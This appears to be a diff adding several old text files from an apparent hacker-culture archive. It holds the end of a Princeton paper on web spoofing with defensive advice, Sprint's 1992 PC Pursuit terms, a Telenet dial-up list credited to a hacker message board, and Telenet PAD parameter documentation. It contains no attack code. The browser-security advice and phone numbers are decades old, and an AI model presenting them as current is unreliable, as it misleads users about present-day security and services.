3. pay attention to the URLs displayed on your browser's location line,
making sure they always point to the server you think you're connected
to.
This strategy will significantly lower the risk of attack, though you could
still be victimized if you are not conscientious about watching the
location line.
At present, JavaScript, ActiveX, and Java all tend to facilitate spoofing
and other security attacks, so we recommend that you disable them. Doing so
will cause you to lose some useful functionality, but you can recoup much
of this loss by selectively turning on these features when you visit a
trusted site that requires them.
Long-term Solution
We do not know of a fully satisfactory long-term solution to this problem.
Changing browsers so they always display the location line would help,
although users would still have to be vigilant and know how to recognize
rewritten URLs.
For pages that are not fetched via a secure connection, there is not much
more that can be done.
For pages fetched via a secure connection, an improved secure-connection
indicator could help. Rather than simply indicating a secure connection,
browsers should clearly say who is at the other end of the connection. This
information should be displayed in plain language, in a manner intelligible
to novice users; it should say something like "Microsoft Inc." rather than
"www.microsoft.com."
Every approach to this problem seems to rely on the vigilance of Web users.
Whether we can realistically expect everyone to be vigilant all of the time
is debatable.
Related Work
We did not invent the URL rewriting technique. Previously, URL rewriting
has been used as a technique for providing useful services to people who
have asked for them.
We know of two existing services that use URL rewriting. The Anonymizer,
written by Justin Boyan at Carnegie Mellon University, is a service that
allows users to surf the Web without revealing their identities to the
sites they visit. The Zippy filter, written by Henry Minsky, presents an
amusing vision of the Web with Zippy-the-Pinhead sayings inserted at
random.
Though we did not invent URL rewriting, we believe we are the first to
realize its full potential as one component of a security attack.
Acknowledgments
The URL-rewriting part of our demonstration program is based on Henry
Minsky's code for the Zippy filter. We are grateful to David Hopwood for
useful discussions about spoofing attacks, and to Gary McGraw and Laura
Felten for comments on drafts of this paper. The figure was designed by
Gary McGraw.
For More Information
More information is available from our Web page at
http://www.cs.princeton.edu/sip, or from Prof. Edward Felten at
felten@cs.princeton.edu or (609) 258-5906.
References
[1] Peter G. Neumann. Computer-Related Risks. ACM Press, New York, 1995.
[2] Gary McGraw and Edward W. Felten. Java Security: Hostile Applets, Holes
and Antidotes. John Wiley and Sons, New York, 1996.
[3] Robert T. Morris. A Weakness in the 4.2BSD UNIX TCP/IP Software.
Computing Science Technical Report 117, AT&T Bell Laboratories, February
1985.
[4] Steven M. Bellovin. Security Problems in the TCP/IP Protocol Suite.
Computer Communications Review 19(2):32-48, April 1989.
[5] Steven M. Bellovin. Using the Domain Name System for System Break-ins.
Proceedings of Fifth Usenix UNIX Security Symposium, June 1995.
[6] Web site at http://www.anonymizer.com
[7] Web site at http://www.metahtml.com/apps/zippy/welcome.html
+211
View File
@@ -0,0 +1,211 @@
TERMS AND CONDITIONS OF USE
FOR PC PURSUIT(R) ACCESS SERVICE
These terms and conditions govern your use of Sprint's PC
Pursuit(R) access service:
1. PC PURSUIT
(A) The PC Pursuit(R) access service allows you to use Sprint's Public
Data Network (PDN) 24 hours a day to access any domestic database, bulletin
board system or other online computer system which is accessible via the PC
Pursuit network, and as listed on the Schedule titled Current Access Codes.
(B) The PC Pursuit Network includes those Hosts, "Outdial Cities" (as
listed on the Schedule titled Current Access Codes) and supported local
exchanges. The Netline Exchange provides a listing of the local exchanges
supported out of each "Outdial City" and is updated from time to time.
(C) You agree to access and use these databases, bulletin boards and
other online systems only in the manner permitted by them.
(D) Sprint is not liable or responsible for any claim or other action
against you by a third party, including owners of online computer systems that
you are not authorized to access or other action taken against Sprint by a
third party based on your unauthorized use of or access to any database or
bulletin board.
2. COST OF PC PURSUIT ACCESS SERVICES
(A) There is a one-time registration fee and a fixed monthly membership
fee based on the membership selected (please refer to the current PC Pursuit
Rate Schedule) for PC Pursuit(R) access service billed when Sprint receives
and processes your order for the service. You will be billed on a prorated
basis for the monthly membership fee for the month in which your order is
accepted and for each month that you have PC Pursuit(R) access service. An
individual may not hold more than one membership.
(B) The monthly membership fee entitles you to use PC Pursuit(R) access
services, not to exceed the membership limit, between the hours of 6:00 P.M.
and 7:00 A.M., prevailing local time, determined by the location of the
Sprint access centers used to access the networks, Monday through Thursday,
and from 6:00 P.M. Friday to 7:00 A.M. Monday, and all day New Year's Day,
July 4th, Labor Day, Thanksgiving and Christmas Day. The prevailing local
time designated above may not be the same as that in which the caller is
located. Non-prime time charges will apply for usage at the cost indicated
on the PC Pursuit Rate Schedule. Usage is rounded to the nearest minute for
purposes of calculating the total usage on each connection.
(C) Non-prime usage exceeding the hours associated with the
membership selected by the user and prime-time PC Pursuit usage between 7:00
A.M. and 6:00 P.M., prevailing local time, Monday through Friday, will be
billed at the rates indicated on the PC Pursuit Rate Schedule.
(D) There will be a fee for issuing a new ID/password, to replace your
original one.
(E) The registration fee and monthly membership fees will be billed
according to the payment option selected at the time of registration provided
to you by Sprint when you signed up for PC Pursuit. Your use of PC Pursuit
is subject to approval of the payment option selected.
(F) There may be charges to you for the use of the online computer
systems to which you gain access through PC Pursuit. These charges, if any,
will be billed to you by those operating the online computer systems and not
by Sprint.
3. HARDWARE
To use PC Pursuit, you must have a modem and either a computer or a
terminal. You are responsible for obtaining and maintaining the appropriate
equipment. Sprint is not responsible for the proper functioning of your
equipment.
4. TERM OF AGREEMENT
This Agreement will be effective from the date you are assigned an
ID/password by Sprint. Either party may cancel the use of PC Pursuit service
and terminate this Agreement by giving the other party thirty (30) days
written notice as described in Section 8.(F) or you may cancel by calling the
number listed in Section 8.(G).
5. TERMINATION
Sprint shall have the right to terminate your use of PC Pursuit
immediately and without notice to you in the event:
(A) Sprint has been notified that your credit card has been
suspended or revoked;
(B) you have used or your PC Pursuit account has been used in a fashion
injurious to other PC Pursuit or Sprint customers, to violate any of
Sprint's Rules and Regulations, or in violation of any of the terms and
conditions of this Agreement;
(C) you have attempted or your PC Pursuit account has been used to
attempt to access or has accessed an address or exchange which is outside of
the PC Pursuit Network;
(D) you have assigned or transferred your ID/password to another;
(E) you have loaned the use of the ID/password to another, unless that
user is qualified under the membership plan selected;
(F) you have resold or attempted to resell or further distribute PC
Pursuit access services without written authorization from Sprint.
6. USE OF PC PURSUIT(R) ACCESS SERVICE
(A) You are responsible for all charges to your account, including
charges incurred by authorized users or third parties who have gained
unauthorized access to your ID/password. Sprint will change your ID/password
immediately upon receipt of notification of unauthorized use.
(B) PC Pursuit access services are furnished to you under the
condition that you will not abuse them or fraudulently use them. Such use of
the service, to be determined in Sprint's sole discretion, constitutes a
violation subject to the termination rights set forth in paragraph 5. of this
Agreement.
(C) The services furnished under this agreement shall not be used in
any way which would be a violation of any law or which would assist anyone in
the violation of any law.
(D) All inquiries with regard to service malfunction shall be via the
Netline Exchange bulletin board which is routinely reviewed by PC Pursuit
product management. Response to such inquiries shall be provided through the
bulletin board as soon as reasonably possible.
7. DISCLAIMER OF WARRANTIES; LIMITATION OF LIABILITIES; INDEMNIFICATION
(A) Sprint makes no warranties of any nature or kind, whether express
or implied for the service provided by Sprint or its equipment, facilities or
capacities. TELENET SPECIFICALLY DISCLAIMS ANY WARRANTY WITH REGARD TO THE
AVAILABILITY OF PC PURSUIT(R) ACCESS SERVICE. Sprint is not responsible for
the inability to access the service at any time. Sprint shall not be
responsible for any damage you suffer, whether it is direct, incidental or
consequential, and whether it is caused by mistake, omission, interruption,
deletion of files, errors, defects, delays in operation or transmission,
failure of performance, negligence or otherwise.
(B) You agree to indemnify and hold Sprint harmless against any claim
arising from the use of your ID/password which causes damage to any other
party.
(C) The information appearing in the bulletin boards, data bases and
other online computer systems are provided by persons who are not affiliated
with Sprint. You use this information at your own risk. If you provide
information for others, you agree to indemnify and hold Sprint harmless from
all claims with respect to the information provided. Sprint reserves the
right to prohibit access to any bulletin board.
(D) Sprint's liability for damages to you under this agreement shall
be limited to the total monthly charges paid by you for the six months
following the date the damages were incurred.
THE FOREGOING WARRANTIES ARE IN LIEU OF ALL OTHER WARRANTIES, EXPRESS OR
IMPLIED, FOR THE PC PURSUIT(R) ACCESS SERVICE.
8. OTHER PROVISIONS
(A) Sprint is not responsible for any loss, including loss of data
resulting from delays or interruption, due to mechanical or communications
defects or outages, or trouble due to fires, storms, floods, strikes or other
labor interruptions, acts of God, power shortages or outages.
(B) If any part of this agreement is held by a court to be unenforceable
for any reason, the remaining parts of this Agreement will remain in full
force and effect.
(C) This Agreement contains the entire agreement between you and Sprint
relating to the use of PC Pursuit.
(D) Sprint reserves the right to change the terms and conditions of
this Agreement, including pricing changes and any sales and use taxes, duties,
or levies imposed by any authority, government or government agency in
connection with the usse of PC Pursuit, on thirty (30) days' written notice.
(E) This Agreement will be governed by the laws of the Commonwealth of
Virginia.
(F) All notices pertaining to this Agreement and your use of PC Pursuit
must be in writing and must be sent, postage prepaid, to the following address:
Sprint
12490 Sunrise Valley Drive
Reston, Virginia 22096
Attention: Product Marketing
VARESA0112
(G) Questions regarding PC Pursuit service registration can be directed
to Telemarketing at:
1-800-736-1130
Effective March 25, 1992
and supersedes all other
versions of this agreement

+409
View File
@@ -0,0 +1,409 @@
Telenet dialups for the US
Submitted via the wwwboard
at the HackerZ Hideout
STATE,CITY: AREA CODE: NUMBER:
AL, Anniston 205 236-9711
AL, Birmingham 205 328-2310
AL, Decatur 205 355-0206
AL, Dothan 205 793-5034
AL, Florence 205 767-7960
AL, Huntsville 205 539-2281
AL, Mobile 205 432-1680
AL, Montgomery 205 269-0090
AL, Tuscaloosa 205 752-1472
AZ, Phoenix 602 254-0244
AZ, Tucson 602 747-0107
AR, Ft.Smith 501 782-2852
AR, Little Rock 501 327-4616
CA, Bakersfield 805 327-8146
CA, Chico 916 894-6882
CA, Colton 714 824-9000
CA, Compton 213 516-1007
CA, Concord 415 827-3960
CA, Escondido 619 741-7756
CA, Eureka 707 444-3091
CA, Fresno 209 233-0961
CA, Garden Grove 714 898-9820
CA, Glendale 818 507-0909
CA, Hayward 415 881-1382
CA, Los Angeles 213 624-2251
CA, Marina Del Rey 213 306-2984
CA, Merced 209 383-2557
CA, Modesto 209 576-2852
CA, Montery 408 646-9092
CA, Norwalk 213 404-2237
CA, Oakland 415 836-4911
CA, Oceanside 619 430-0613
CA, Palo Alto 415 856-9995
CA, Pomona 714 626-1284
CA, Sacramento 916 448-6262
CA, Salinas 408 443-4940
CA, San Carlos 415 591-0726
CA, San Diego 619 233-0233
CA, San Francisco 415 956-5777
CA, San Jose 408 294-9119
CA, San Pedro 213 548-6141
CA, San Rafael 415 472-5360
CA, San Ramon 415 829-6705
CA, Santa Ana 714 558-7078
CA, Santa Barbara 805 682-5361
CA, Santa Cruz 408 429-6937
CA, Santa Rosa 707 656-6760
CA, Stockton 209 957-7610
CA, Thousand Oaks 805 495-3588
CA, Vallejo 415 724-4200
CA, Ventura 805 656-6760
CA, Visalia 209 627-1201
CA, West Covina 818 915-5151
CA, Woodland Hills 818 887-3160
C0, Colorado 719 635-5361
CO, Denver 303 337-6060
CO, Ft. Collins 303 493-9131
CO, Grand Junction 303 241-3004
CO, Greeley 303 352-8563
CO, Pueblo 719 542-4053
CT, Bridgeport 203 335-5055
CT, Danbury 203 794-9075
CT, Hartford 203 247-9479
CT, Middletown 203 344-8217
CT, New Britain 203 225-7027
CT, New Haven 203 624-5954
CT, New London 203 447-8455
CT, Norwalk 203 866-7404
CT, Stamford 203 348-0787
CT, Waterbury 203 753-4512
DE, Dover 302 678-8328
DE, Newark 302 454-7710
DC, Washington 202 429-7896
DC, Washington 202 429-7800
FL, Boca Raton 407 338-3701
FL, Cape Coral 813 275-7924
FL, Cocoa Beach 407 267-0800
FL, Daytona Beach 904 255-2629
FL, Ft. Lauderdale 305 764-4505
FL, Gainsville 904 338-0220
FL, Jacksonville 904 353-1818
FL, Lakeland 813 683-5461
FL, Melbourne 407 242-8247
FL, Miami 305 372-0230
FL, Naples 813 263-3033
FL, Ocala 904 351-3790
FL, Orlando 407 422-4099
FL, Pensacola 904 432-1335
FL, Pompano Beach 305 941-5445
FL, St. Petersburg 813 323-4026
FL, Sarasota 813 923-4563
FL, Tallahassee 904 681-1902
FL, Tampa 813 224-9920
FL, West Palm Beach 407 833-6691
GA, Albany 912 888-3011
GA, Athens 404 548-5590
GA, Atlanta 404 523-0834
GA, Augusta 404 724-2752
GA, Colombus 404 571-0556
GA, Macon 912 743-8844
GA, Rome 404 234-1428
GA, Savannah 912 236-2605
HI, Oahu 808 528-0200
ID, Boise 208 343-0611
ID, Idaho Falls 208 529-0406
ID, Lewiston 208 743-0099
ID, Pocatella 208 232-1764
IL, Aurora 312 896-0620
IL, Bloomington 309 827-7000
IL, Chicago 312 938-0600
IL, Decatur 217 429-0235
IL, Dekalb 815 758-2623
IL, Joliet 815 726-0070
IL, Peoria 309 637-8570
IL, Rockford 815 965-0400
IL, Springfield 217 753-1373
IL, Urbana 217 384-6428
IN, Bloomington 812 332-1344
IN, Evansville 812 424-7693
IN, Ft. Wayne 219 426-2268
IN, Gary 219 882-8800
IN, Indianapolis 317 299-0024
IN, Kokomo 317 455-2460
IN, Lafayette 317 742-6000
IN, Muncie 317 282-6418
IN, South Bend 219 233-7104
IN, Terre Haute 812 232-5329
IA, Ames 515 233-6300
IA, Cedar Rapids 319 364-0911
IA, Davenport 319 324-2445
IA, Des Moines 515 288-4403
IA, Dubuque 319 556-0783
IA, Iowa City 319 351-1421
IA, Sioux City 712 255-1545
IA, Waterloo 319 232-5441
KS, Lawrence 913 843-8124
KS, Manhattan 913 537-0948
KS, Salina 913 825-7900
KS, Topeka 913 233-9880
KS, Wichita 316 262-5669
KY, Bowling Green 502 782-7941
KY, Frankfort 502 875-4654
KY, Lexington 606 233-0312
KY, Louisville 502 589-5580
KY, Owensboro 502 686-8107
LA, Alexandria 318 445-1053
LA, Baton Rouge 504 343-0753
LA, Lafayette 318 233-0002
LA, Lake Charles 318 436-0518
LA, Monroe 318 387-6330
LA, New Orleans 504 524-4094
LA, Shreveport 318 221-5833
ME, Augusta 207 622-3123
ME, Brewer 207 989-3081
ME, Lewiston 207 784-0105
ME, Portland 207 761-4000
MD, Annapolis 301 224-8550
MD, Baltimore 301 727-6060
MD, Frederick 301 293-9596
MA, Boston 617 292-0662
MA, Brockton 508 580-0721
MA, Fall River 508 677-4477
MA, Framingham 508 879-6798
MA, Lawrence 508 975-2273
MA, Lexington 617 863-1550
MA, Lowell 508 937-5214
MA, New Bedford 508 999-2915
MA, Northampton 413 586-0510
MA, Pittsfield 413 499-7741
MA, Salem 508 744-1559
MA, Springfield 413 781-3811
MA, Woods Hole 508 540-7500
MA, Worcester 508 755-4740
MI, Ann Arbor 313 996-5995
MI, Battle Creek 616 968-0929
MI, Detroit 313 964-2988
MI, Flint 313 235-8517
MI, Grand Rapids 616 774-0966
MI, Jackson 517 782-8111
MI, Kalamazoo 616 345-3088
MI, Lansing 517 484-0062
MI, Midland 517 832-7068
MI, Muskegon 616 726-5723
MI, Pontiac 313 332-5120
MI, Port Huron 313 982-8364
MI, Saginaw 517 790-5166
MI, Southfield 313 827-4710
MI, Traverse City 616 946-2121
MI, Warren 313 575-9152
MN, Duluth 218 722-1719
MN, Mankato 517 388-3780
MN, Minneapolis 612 341-2459
MN, Rochester 507 282-5917
MN, St. Cloud 612 253-2064
MS, Gulfport 601 863-0024
MS, Jackson 601 969-0036
MS, Meridian 601 482-2210
MS, Starkville 601 324-2155
MO, Columbia 314 449-4404
MO, Jefferson City 314 634-5178
MO, Kansas City 816 221-9900
MO, St. Joseph 816 279-4797
MO, St. Louis 314 421-4990
MO, Springfield 417 864-4814
MT, Billings 406 245-7649
MT, Great Falls 406 771-0067
MT, Helena 406 443-0000
MT, Missoula 406 721-5900
NE, Lincoln 402 475-4964
NE, Omaha 402 341-7733
NV, Las Vegas 702 737-6861
NV, Reno 702 827-6900
NH, Concord 603 224-1024
NH, Durham 603 868-2924
NH, Manchester 603 627-8725
NH, Nashua 603 880-6241
NH, Portsmouth 603 431-2302
NJ, Atlantic City 609 348-0561
NJ, Freehold 201 780-5030
NJ, Hackensack 201 488-6567
NJ, Marlton 609 596-1500
NJ, Merchantville 609 663-9297
NJ, Morristown 201 455-0275
NJ, New Brunswick 201 745-2900
NJ, Newark 201 623-0469
NJ, Passaic 201 778-5600
NJ, Paterson 201 684-7560
NJ, Princeton 609 799-5587
NJ, Rahway 201 815-1885
NJ, Redbank 201 571-0003
NJ, Roseland 201 227-5277
NJ, Sayreville 201 525-9507
NJ, Trenton 609 989-8847
NM, Albuquerque 505 243-4479
NM, Las Cruces 505 526-9191
NM, Santa Fe 505 473-3403
NY, Albany 518 465-8444
NY, Binghampton 607 772-6642
NY, Buffalo 716 847-1440
NY, Dear Park 516 667-5566
NY, Hempstead 516 292-3800
NY, Ithaca 607 277-2142
NY, New York City 212 741-8100
NY, New York City 212 620-6000
NY, Plattsburgh 518 562-1890
NY, Poughkeepsie 914 473-2240
NY, Rochester 716 454-1020
NY, Syracuse 315 472-5583
NY, Utica 315 797-0920
NY, Whit Plains 914 328-9199
NC, Asheville 704 252-9134
NC, Charlotte 704 332-3131
NC, Fayetteville 919 323-8165
NC, Gastonia 704 865-4708
NC, Greensboro 919 273-2851
NC, High Point 919 889-7494
NC, North Wilkesboro 919 838-9034
NC, Raleigh 919 834-8254
NC, Res Tri Park 919 549-8139
NC, Tarboro 919 823-0579
NC, Wilmington 919 763-8313
NC, Winston-Salem 919 725-2126
ND, Fargo 701 235-7717
ND, Grand Forks 701 775-7813
ND, Mandan 701 663-2256
OH, Canton 216 452-0903
OH, Cincinnati 513 579-0390
OH, Cleveland 216 575-1658
OH, Colombus 614 463-9340
OH, Dayton 513 461-5254
OH, Elyria 216 323-5059
OH, Hamilton 513 863-4116
OH, Kent 216 678-5115
OH, Lorain 216 960-1170
OH, Mansfield 419 526-0686
OH, Sandusky 419 627-0050
OH, Springfield 513 324-1520
OH, Toledo 419 255-7881
OH, Warren 216 394-0041
OH, Wooster 216 264-8920
OH, Youngstown 216 743-1296
OK, Bartlesville 918 336-3675
OK, Lawton 405 353-0333
OK, Oklahoma City 405 232-4546
OK, Stillwater 405 624-1113
OK, Tulsa 918 584-3247
OR, Corvallis 503 754-9273
OR, Eugena 503 683-1460
OR, Hood River 503 386-4405
OR, Klamath Falls 503 882-6282
OR, Medford 503 779-6343
OR, Portland 503 295-3028
OR, Salem 503 378-7712
PA, Allentown 215 435-3330
PA, Altoona 814 949-0310
PA, Carlisle 717 249-9311
PA, Danville 717 271-0102
PA, Erie 814 899-2241
PA, Harrisburg 717 236-6882
PA, Johnstown 814 535-7576
PA, King Of Prussia 215 337-4300
PA, Lancaster 717 295-5405
PA, Philadelphia 215 574-9462
PA, Pittsburgh 412 288-9950
PA, Reading 215 376-8750
PA, Scranton 717 961-5321
PA, State College 814 231-1510
PA, Wilkes-Barre 717 829-3108
PA, Williamsport 717 494-1796
PA, York 717 846-6550
RI, Providence 401 751-7910
SC, Charleston 803 722-4303
SC, Columbia 803 254-0695
SC, Greenville 803 233-3486
SC, Spartenburg 803 585-1637
SC, Pierre 605 224-0481
SC, Rapid City 605 348-2621
SC, Sioux Falls 605 336-8593
TN, Bristol 615 968-1130
TN, Chattanooga 615 756-1161
TN, Clarksville 615 552-0032
TN, Johnson City 615 282-6645
TN, Knoxville 615 525-5500
TN, Memphis 901 521-0215
TN, Nashville 615 244-3702
TN, Oak Ridge 615 481-3590
TX, Abilene 915 676-9151
TX, Amarillo 806 373-0458
TX, Athens 214 677-1712
TX, Austin 512 928-1130
TX, Brownsville 512 542-0367
TX, Bryan 409 822-0159
TX, Corpus Christi 512 884-9030
TX, Dallas 214 748-6371
TX, El Paso 915 532-7907
TX, Ft. Worth 817 332-4307
TX, Galveston 409 762-4382
TX, Houston 713 227-1018
TX, Laredo 512 724-1791
TX, Longview 214 236-4205
TX, Lubbock 806 747-4121
TX, Mcallen 512 686-5360
TX, Midland 915 561-9811
TX, Nederland 409 722-3720
TX, San Angelo 915 944-7612
TX, San Antonio 512 225-8004
TX, Sherman 214 893-4995
TX, Temple 817 773-9723
TX, Tyler 214 597-8925
TX, Waco 817 752-9743
TX, Wichita Falls 817 322-3774
UT, Ogden 801 627-1630
UT, Provo 801 373-0542
UT, Salt Lake City 801 359-0149
VT, Burlington 802 864-0808
VT, Montpelier 802 229-4966
VT, Rutland 802 775-1676
VT, White River Jct. 802 295-7631
VA, Blacksburg 703 552-9181
VA, Charlottesville 804 977-5330
VA, Covington 703 962-2217
VA, Fredericksburg 703 371-0188
VA, Harrisonburg 703 434-7121
VA, Herndon 703 435-1800
VA, Lynchburg 804 845-0010
VA, Newport News 804 596-6600
VA, Norfolk 804 625-1186
VA, Richmond 804 788-9902
VA, Roanoke 703 344-2036
WA, Auburn 206 939-9982
WA, Bellingham 206 733-2720
WA, Everett 206 775-9929
WA, Longview 206 577-5835
WA, Olympia 206 754-0460
WA, Richland 509 943-0649
WA, Seattle 206 625-9612
WA, Spokane 509 455-4071
WA, Tacoma 206 627-1791
WA, Vancouver 206 693-6914
WA, Wenatchee 509 663-6227
WA, Yakima 509 575-1060
WV, Charleston 304 343-6471
WV, Huntington 304 523-2802
WV, Morgantown 304 292-0104
WV, Wheeling 304 233-7732
WI, Beloit 608 362-5287
WI, Eau Claire 715 836-9295
WI, Green Bay 414 432-2815
WI, Kenosha 414 552-9242
WI, La Crosse 608 784-0560
WI, Madison 608 257-5010
WI, Milwaukee 414 271-3914
WI, Neenah 414 722-7636
WI, Racine 414 632-6166
WI, Sheboygan 414 452-3995
WI, Wausau 715 845-9584
WI, West Bend 414 334-2206
WY, Casper 307 265-5167
WY, Cheyenne 307 638-4421
WY, Laramie 307 721-5878
+892
View File
@@ -0,0 +1,892 @@
Telenet ITI Parameters
----------------------
Summary of Telenet ITI Parameters
---------------------------------
Para- Para-
meter Description (Default Value) meter Description (Default Value)
----- --------------------------- ----- ---------------------------
1 Line feed Insertion (0) 31+ Interrupt Character (0)
2 Network Message Display (0) 32 Automatic Hang-up (0)
3 Echo (1) 33+ Flush Output (0)
4 Echo Mask (163) 34 Transmit on Timers (1)
5 Transmit Mask (2) 35 Idle Timer (80)
6* Buffer Size (0) 36 Interval Timer (0)
7* Command Mask (127) 37 Network Usage Display (0)
8* Command Mask (3) 38 Carriage Return PAD (Variable)
9 Carriage Return PAD (Fixed) 39 Padding Options (1)
10 Linefeed Padding 40 Insert on Break (0)
11 Tab Padding 41 PAD-Terminal Flow Control (0)
12 Line Width 42 PAD-Terminal XON Character (17)
13 Page Length (0) 43 PAD-Terminal XOFF Character (19)
14 Line Folding (1) 44* Generate Break (INV)
15 Page Wait (0) 45* APP on Break (0)
16 Interrupt on Break (0) 46 Input Unlock Option (0)
17 Break Code (0) 47 Input Unlock Timer (0)
18 NVT Options (0) 48 Input Unlock Character (0)
19 Initial Keyboard State (0) 49 Output Lock Option (2)
20 Half/Full Duplex 50 Output Lock Timer (10)
21 Real Character Code 51 Output Lock Option (0)
22 Printer Style 53* Break Options (0)
23 Terminal Type 54 Terminal-PAD Flow Control (0)
24 Permanent Terminal (0) 55 Terminal-PAD XON Character (17)
25 Manual or Auto Connect (0) 56 Terminal-PAD XOFF Character (19)
26 Rate 57 Connection Mode (2)
27 Delete Character (127) 58 Escape to Command Mode (1)
28 Cancel Character (24) 59* Flush Output on Break (0)
29 Display Character (18) 60 Delayed Echo
30+ Abort Output Character (0) 63 Eight-bit Transparency (1)
64+ Early ACK (0)
65 More-Data Bit Generation (3)
66 Defer Processing of User (0)
67 ESP Packetizing Option (0)
68 Escape Sequence Timer (0)
69 Escape Sequence Maximum Length (0)
70 Escape Sequence Initiator (0)
71 Parameter Reset on Disconnect (0)
Note: All Telenet Parameters must follow the National Option Marker
(Parameter 0, value '21' Hex) in PAD Messages.
Parameters marked with "*" should not be used.
Parameters marked with "+" should be used with caution.
Telenet ITI Parameters Arranged by Functional Category
------------------------------------------------------
Para- Para-
meter Description (Default Value) meter Description (Default Value)
----- --------------------------- ----- ---------------------------
(CONNECTION MODE) (BREAK HANDLING)
57 Connection Mode (2) 16 Interrupt on Break (0)
58 Escape to Command Mode (1) 40 Insert on Break (0)
17 Break Code (0)
(CALL ESTABLISHMENT & CLEARING) 44* Generate Break (INV)
25 Manual or Auto Connect (0) 45* APP on Break (0)
32 Automatic Hang-up (0) 59* Flush Output on Break (0)
53* Break Options (0)
(COMMAND PROTECTION)
7* Command Mask (127) (VIRTUAL TERMINAL DEVICE)
8* Command Mask (3) 39 Padding Options (1)
9 Carriage Return PAD (Fixed)
(DEVICE DEPENDENT) 38 Carriage Return PAD (Variable)
24 Permanent Terminal (0) 10 Linefeed Padding
23 Terminal Type 11 Tab Padding
20 Half/Full Duplex 12 Line Width
21 Real Character Code 13 Page Length (0)
22 Printer Style 14 Line Folding (1)
26 Rate 15 Page Wait (9)
63 Eight-bit Transparency (1) 1 Linefeed Insertions (0)
(TERMINAL DISPLAY) (VIRTUAL TERMINAL PROCESS)
3 Echo (1) 18 NVT Options (0)
4 Echo Mask (163) 27 Delete Character (127)
2 Network Message Display (0) 28 Cancel Character (24)
37 Network Usage Display (0) 29 Display Character (18)
60 Delayed Echo (0) 31 Interrupt Character (0)
30 Abort Output Character (0)
(PACKET ASSEMBLY/DISASSEMBLY) 33 Flush Output (0)
6* Buffer Size (0)
5 Transmit Mask (2)
34 Transmit on Timers (1) (2741 Terminal Support)
35 Idle Timer (80) 19 Initial Keyboard State (0)
36 Interval Timer (0) 46 Input Unlock Option (0)
60 Delayed Echo 47 Input Unlock Timer (0)
64 Early ACK (0) 48 Input Unlock Character (0)
65 More-Data Bit Generation (3) 49 Output Lock Option (2)
50 Output Lock Timer (10)
(RESELECT HANDLING) 51 Output Lock Option (0)
66 Defer Processing of Input
71 Parameter Reset on Disc (0) (ESCAPE SEQUENCE PROCESSING)
67 ESP Packetizing Option (0)
(FLOW CONTROL) 68 Escape Sequence Timer (0)
41 PAD-Terminal Flow Control (0) 69 Escape Sequence Length (0)
42 PAD-Terminal XON Character (17) 70 Escape Sequence Initiator (0)
43 PAD-Terminal XOFF Character (19)
54 Terminal-PAD Flow Control (0)
55 Terminal-PAD XON Character (17)
56 Terminal-PAD XOFF Character (19)
Parameters marked with "*" should not be used.
Detail of Telenet ITI Parameters
Following is a description of each of the Telenet ITI parameters. Defaults
for Telenet Public Dial Ports are noted
As noted by (+) use the equivalent X.3 parameter wherever possible
Parameters marked (*) are archaic and should not be used.
Para-
meter Description
----- -----------
+1 Linefeed Insertion
This parameter instructs the PAD to routinely insert a linefeed
(LF) character into the data stream following each appearance of a
carriage return (CR) character. Values may be OR-ed together:
0 No LF Insertion (Default)
1 Insert LF after CR on output to the terminal
2 Insert LF after CR on input from the terminal
4 Insert LF after CR on echo to the terminal
+2 Network Message Display
This parameter controls the transmission of network-oriented
messages to the terminal. Values are:
0 Transmit network-oriented messages (Default)
1 Suppress network-oriented messages
+3 Echo
This specifies whether or not the network returns images of
characters entered from the terminal during Data Transfer mode.
Values are:
0 Network does not echo
1 Network echoes according to the Echo Mask (Default)
4 Echo Mask
The Echo Mask specifies which characters are to be echoed during
Data Transfer mode. Values may be OR-ed together:
1 Alphanumerics
2 Carriage Return
4 Escape
8 Editing Characters
16 Terminators
32 Form Effectors
64 Control Characters
128 Other Characters
Default is 163 = 1+2+32+128 (Alphanumerics, Carriage Return, Form
Effectors, and Other Characters).
+5 Transmit Mask
The Transmit Mask specifies those characters which indicate a
logical break in the data being entered from a terminal and which
force transmission of that data to its destination. Values may be
OR-ed together:
0 Transmission on Transmit Mask disabled
1 Alphanumerics
2 Carriage Return (Default)
4 Escape
8 Editing Characters
16 Terminators
32 Form Effectors
64 Control Characters
128 Other Characters
Note: see Character Codes and Masking Categories below
*6 Buffer Size
This parameter is archaic and should no longer have any affect on a
TP. It is used to specify the maximum number of characters that
will be accumulated by the network before they are forwarded to the
Host.
0 Buffer 256 characters (Default)
1-255 Buffer 1-255 characters
*7 Command Mask
This is an archaic parameter. Its use has been phased out, but the
parameter number has not be redefined for another function.
*8 Command Mask
This is an archaic parameter which has not been redefined to
support another function.
+9 Carriage Return Padding
The Carriage Return Padding parameters specify the number of PAD
character times to be inserted after each carriage return
character sent to the terminal. Parameter 9 specifies the Fixed
Component. Values may run from 0 through 31 character-times of
padding provided.
+10 Linefeed Padding
This specifies the number of pad character delays inserted after
each linefeed (LF) character sent to the terminal. Values may
range from 0 through 15 character-times of padding provided.
11 Tab Padding
This specifies the number of pad character delays inserted after
each horizontal tabulation (HT) character sent to the terminal.
Values may range from 0 through 15 character-times of padding
provided.
12 Line Width
This identifies the number of character positions per terminal
print line. Values range from 1 through 255 characters per line;
or 0, which specifies 256 characters per line.
13 Page Length
This parameter identifies the number of lines per terminal page or
display screen. Values range from 1 through 255 lines per page; or
0, which specifies an infinite page length.
14 Line Folding
This parameter specifies whether or not the PAD begins a new line
when the number of characters in a print line exceeds the line
width:
0 Disable line folding
1 Enable line folding (Default)
15 Page Wait
This parameter specifies whether or not the PAD automatically
enters a flow controlled state (X-OFFed) at the end of each page.
Page length is defined by Telenet parameter 13, above.
0 Page Wait disabled (Default)
1 Page Wait enabled
+16 Interrupt on Break
This parameter specifies whether or not the PAD will transmit an
INTERRUPT packet to the Host when a break signal is received from
the terminal. Values are:
0 No INTERRUPT packet sent on break (Default)
1 Send INTERRUPT packet on break
17 Break Code
The Break Code specifies an eight-bit representation for the break
signal condition. Codes may be any number from 1 through 255.
Default is 0 (No break code).
+18 Network Virtual Terminal (NVT) Option
This parameter enables or disables NVT facilities by functional
group (The Process Control function should no longer be used):
0 NVT disabled (Default)
2 Enables Process Control function *
4 Enables Editing Function
* use with caution
*19 Initial Keyboard State
This archaic parameter defined the initial state of the terminal
keyboard at the beginning of a virtual call.
0 Keyboard initially locked (Default)
1 Keyboard initially unlocked
20 Half/Full Duplex
This parameter specifies the echoing requirement of the terminal.
Values are:
0 Full duplex terminal
1 Half duplex terminal
*21 Real Character Code
This parameter specified the communications code for representing
data generated or recognized by the terminal. Values are:
0 ASCII
1 Correspondence (standard Selectric)
2 EBCD
